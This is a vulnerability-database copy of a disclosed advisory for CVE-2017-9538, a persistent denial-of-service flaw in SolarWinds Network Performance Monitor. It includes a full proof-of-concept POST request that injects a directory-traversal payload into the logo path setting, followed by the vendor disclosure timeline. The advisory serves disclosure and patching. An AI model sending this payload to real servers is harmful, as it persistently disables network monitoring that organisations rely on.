Vulners
Lucene search
SolarWinds Network Performance Monitor 12.0.15300.90 Denial Of Service Vulnerability
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | SolarWinds Network Performance Monitor Denial of Service Vulnerability | 31 Oct 201700:00 | – | cnvd |
 | CVE-2017-9538 | 2 Oct 201714:00 | – | cve |
 | CVE-2017-9538 | 2 Oct 201714:00 | – | cvelist |
 | EUVD-2017-18469 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-9538 | 3 Oct 201701:29 | – | nvd |
 | SolarWinds Orion NPM 12.0.15300.90 Multiple Vulnerabilities | 21 Nov 201700:00 | – | openvas |
 | SolarWinds Network Performance Monitor 12.0.15300.90 Denial Of Service | 29 Sep 201700:00 | – | packetstorm |
 | Directory traversal | 3 Oct 201701:29 | – | prion |
-------------------------------------------------------------
Vulnerability type: Persistent Application Denial of Service
-------------------------------------------------------------
Credit: Andy Tan
CVE ID: CVE-2017-9538
-----------------------------------------------
Product: SolarWinds Network Performance Monitor
-----------------------------------------------
Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier
Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1
Description: An attacker has to inject an arbitrary payload e.g. ../../../boot.ini into the vulnerable field. After successful submission, the entire web application will encounter an error message displaying 'Unexpected Website Error, Cannot use a leading .. to exit above the top directory'. In other words, the denial of service is caused by an incorrect implementation of a directory-traversal protection mechanism. Restarting the service and the entire server itself does not resolve this issue.
Affected URL: https://<ip>/Orion/Admin/Settings.aspx
Navigation: Settings -> Web Console Settings -> Site Logo -> Upload logo from external path
Affected parameter: ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoPath
================
Proof of Concept
================
POST /Orion/Admin/Settings.aspx HTTP/1.1
<Fill up rest of the headers>
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__AntiXsrfTokenInput"
b752b8b9beec4c46ab90559cfcd2bc01
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00_ctl00_ctl00_BodyContent_ContentPlaceHolder1_adminContentPlaceholder_fileUploadImage_ClientState"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$imgbtnSubmit
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00_ctl00_ctl00_BodyContent_ContentPlaceHolder1_adminContentPlaceholder_fileUploadImageNoc_ClientState"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUJNzUxMTg4OTYyDxYCHhNWYWxpZGF0ZVJlcXVlc3RNb2RlAgEWAmYPZBYCZg9kFgJmDw8WBB4PX19BbnRpWHNyZlRva2VuBSBiNzUyYjhiOWJlZWM0YzQ2YWI5MDU1OWNmY2QyYmMwMR4SX19BbnRpWHNyZlVzZXJOYW1lBQZhZG1pbjFkFgICBA9kFgICAQ9kFgICBA8WBB4FY2xhc3MFDnN3LWFwcC1yZWdpb24gHgdlbmN0eXBlBRNtdWx0aXBhcnQvZm9ybS1kYXRhFgICBQ9kFgICAQ9kFjYCAg8PFgQeCENzc0NsYXNzBRYgc3ctYnRuLXByaW1hcnkgc3ctYnRuHgRfIVNCAgIWAh4KYXV0b21hdGlvbgUWRG93bmxvYWQgaW5zdGFsbGVyIG5vd2QCBBAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCBRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCBhAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCCRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCChAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCDA8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7FgYCAQ9kFgICAQ9kFgJmDxYEHgJpZAVfY3RsMDBfY3RsMDBfY3RsMDBfQm9keUNvbnRlbnRfQ29udGVudFBsYWNlSG9sZGVyMV9hZG1pbkNvbnRlbnRQbGFjZWhvbGRlcl9maWxlVXBsb2FkSW1hZ2VfY3RsMDIfCAUMd2lkdGg6MzU1cHg7ZAICDw8WBB8FBSN4LWZvcm0tZmlsZS1idG4gc3ctYnRuLXNtYWxsIHN3LWJ0bh8GAgIWAh8HBQZCcm93c2VkAgQQDxYEHwUFE3N3LXZhbGlkYXRpb24tZX
Jyb3IfBgICZGRkAg4PFgIfCAUOZGlzcGxheTpibG9jazsWAgIFEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIQDxYCHwgFDmRpc3BsYXk6YmxvY2s7FgYCAQ9kFgICAQ9kFgJmDxYEHwkFYmN0bDAwX2N0bDAwX2N0bDAwX0JvZHlDb250ZW50X0NvbnRlbnRQbGFjZUhvbGRlcjFfYWRtaW5Db250ZW50UGxhY2Vob2xkZXJfZmlsZVVwbG9hZEltYWdlTm9jX2N0bDAyHwgFDHdpZHRoOjM1NXB4O2QCAg8PFgQfBQUjeC1mb3JtLWZpbGUtYnRuIHN3LWJ0bi1zbWFsbCBzdy1idG4fBgICFgIfBwUGQnJvd3NlZAIEEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAISDxYCHwgFDmRpc3BsYXk6YmxvY2s7FgICBRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCFBAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCFhAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCGA8QZBAVAxFTaG93IFdvcnN0IFN0YXR1cyNTaG93IFdvcnN0IFN0YXR1cyAoSW50ZXJmYWNlcyBvbmx5KRVTaG93IG9ubHkgSUNNUCBTdGF0dXMVAwEqFE9yaW9uLk5QTS5JbnRlcmZhY2VzABQrAwNnZ2dkZAIZDxYCHgRUZXh0Bb4BV2hlbiBzaG93aW5nIHRoZSBzdGF0dXMgb2YgYW55IHNpbmdsZSBub2RlIG9uIHRoZSBub2RlIHRyZWUgb3Igb24gYSBtYXAsPGJyIC8+eW91IGNhbiBzaG93IHRoZSBzdGF0dXMgb2YgdGhlIG5vZGUgYW5kIGl0cyBjaGlsZHJlbiwgbm9kZSBzdGF0dXMgYW5
kIGludGVyZmFjZXMsPGJyIC8+b3IganVzdCBub2RlIElDTVAgc3RhdHVzLmQ!
CHA8WAh8
KBVJQcm92aWRlIGlubGluZSBoaW50cyBmb3IgaW50ZWdyYXRpbmcgeW91ciBjdXJyZW50bHkgaW5zdGFsbGVkIFNvbGFyV2luZHMgcHJvZHVjdHMuZAIgEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIhEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIjEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIkEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAImEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAInEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIpEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIqEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIrEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIxEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIyEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIzDw8WBh8KBQZTdWJtaXQfBQUWIHN3LWJ0bi1wcmltYXJ5IHN3LWJ0bh8GAgIWAh8HBQZTdWJtaXRkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBVBjdGwwMCRjdGwwMCRjdGwwMCRCb2R5Q29udGVudCRDb250ZW50UGxhY2VIb2xkZXIxJGFkbWluQ29udGVudFBsYWNlaG9sZGVyJGxvZ29DYgVZY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRmaWxlVXBsb
2FkSW1hZ2UFV2N0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkbG9nb0Zyb21VcmxDYgVTY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRub2NMb2dvQ2IFXGN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkZmlsZVVwbG9hZEltYWdlTm9jBVpjdGwwMCRjdGwwMCRjdGwwMCRCb2R5Q29udGVudCRDb250ZW50UGxhY2VIb2xkZXIxJGFkbWluQ29udGVudFBsYWNlaG9sZGVyJG5vY0xvZ29Gcm9tVXJsQ2IFWmN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JBdWRpdGluZ1RyYWlscwViY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRjaGJTaG93RGF0YVBvaW50c09uTGluZXMFW2N0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JOb3RpZnlSZW1vdmFibGUFYGN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JBdXRvbWF0aWNHZW
9sb2NhdGlvbgUuY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkY3RsMD!
AkTG9naW
5WaWV3MQ8PZAIBZAUuY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkY3RsMDAkTG9naW5WaWV3Mg8PZAIBZBC54iMHZwWuUrSOCyy3YhYFyEN1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
8442CAB0
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbSessionTimeout"
25
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlWindowsAccountLogin"
False
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbAutoRefresh"
5
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoCb"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImage$ctl00"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImage$ctl02"; filename=""
Content-Type: application/octet-stream
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoFromUrlCb"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoPath"
./../../boot.ini
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$nocLogoCb"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImageNoc$ctl00"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImageNoc$ctl02"; filename=""
Content-Type: application/octet-stream
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$nocLogoPath"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbSiteLoginText"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbHelpServer"
http://www.SolarWinds.com
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlRollupWorstStatus"
False
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlNodeChildStatusParticipationRule"
*
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlNodeChildStatusDisplayMode"
NoBlink
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlTipsIntegration"
1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$cbDragAndDropResources"
1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$cbAuditingTrails"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbChartAspect"
0.620000004768372
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbThumbnailAspect"
0.600000023841858
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbPercentile"
95
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbMaximumSeries"
10
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$chbShowDataPointsOnLines"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlFontSize"
1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbAutoRefreshActiveAlerts"
1
-----------------------------180072296016649028841705926975--
------------------------
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone.
2017-08-22: Contacted vendor again.
2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3
2017-09-28: Contacted vendor again.
2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3
2017-09-29: Public disclosure.
# 0day.today [2018-03-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
EPSS0.05631